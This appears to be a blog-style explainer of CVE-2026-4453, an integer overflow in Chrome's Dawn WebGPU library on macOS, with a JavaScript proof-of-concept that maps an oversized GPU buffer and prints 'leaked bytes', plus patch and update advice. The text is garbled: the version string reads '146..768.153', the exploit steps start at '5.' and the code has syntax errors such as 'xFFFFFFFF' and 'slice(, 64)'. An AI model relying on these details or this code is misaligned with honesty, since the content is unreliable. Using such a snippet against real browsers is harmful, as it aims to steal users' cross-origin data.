CVE-2026-4453 - Integer Overflow in Dawn Lets Hackers Leak Cross-Origin Data in Google Chrome (Mac)

A serious vulnerability, CVE-2026-4453, was discovered in Google Chrome's Dawn graphics library on macOS, leading up to version 146..768.153. This high-severity bug is particularly dangerous because it lets remote attackers leak cross-origin data — in simple terms, this means malicious websites can steal sensitive information from other sites you have open in your browser.

Below, we break down what happened, how the exploit works, show code snippets, and discuss how to stay protected.

What Is Dawn?

Dawn is Chrome's WebGPU implementation, responsible for handling advanced graphics in the browser. It's a big deal for sites and web apps that use GPU acceleration or fancy rendering.

The Bug: Integer Overflow

The root problem in CVE-2026-4453 is an *integer overflow* during buffer allocation in Dawn. An integer overflow happens when a calculation exceeds the maximum value that can be stored, causing the number to "wrap around" and often resulting in way-too-small allocations. Hackers love this, because they can trick a program into writing or reading way more data than it should, sometimes leaking secrets.

Affected: Google Chrome on macOS (before v146..768.153)

- What attackers can do: Leak cross-origin data (like session tokens, credentials, or private user data of other websites and web apps you have open)

Attacker writes or reads outside the allocated buffer.

5. Attacker picks up leftovers in memory from other origins/tabs.

Example Exploit Snippet (Simple Proof-of-Concept)

Note: This is a simplified (non-harmful!) demonstration, based on how buffer overflows often work with graphics APIs.

// This code triggers the integer overflow in Dawn's buffer allocations
const adapter = await navigator.gpu.requestAdapter();
const device = await adapter.requestDevice();

// Intentionally large size to trigger overflow
let bigSize = xFFFFFFFF; // Max unsigned 32 bit integer

try {
  let buffer = device.createBuffer({
    size: bigSize,
    usage: GPUBufferUsage.MAP_READ | GPUBufferUsage.COPY_DST
  });

  // Normally, this should throw/abort. Prior to the fix, allocation may succeed incorrectly.
  await buffer.mapAsync(GPUMapMode.READ);
  let data = new Uint8Array(buffer.getMappedRange());

  // The attacker scans through 'data' for leaked memory
  console.log('Leaked bytes:', data.slice(, 64));
} catch (e) {
  console.log('Bug fixed or not vulnerable:', e.message);
}

This shows how an overlarge buffer size could allow reading from memory you shouldn't access.

Google's Official Fix

Google patched this bug in Chrome 146..768.153 by validating buffer sizes and properly checking for overflows. Now, attempting this exploit triggers an error instead of returning a buffer with accidental access.

References

- Chromium Security Advisories
- Chromium Issue Tracker (Search for CVE-2026-4453)
- Dawn Git Source

Update Chrome ASAP!

Go to chrome://settings/help and update to version 146..768.153 or later.

Conclusion

CVE-2026-4453 is a prime example of how advanced web technology can inadvertently open up dangerous security holes. Quickly patching your browser and using safe browsing habits will keep you secure against this and other threats.

If you’re curious for more technical details, check out Chromium’s source code or search the bug tracker. Thanks to responsible disclosure, Chrome users stayed safe—so keep your browser up to date!

Timeline

Published on: 03/20/2026 01:34:52 UTC
Last modified on: 03/20/2026 19:04:24 UTC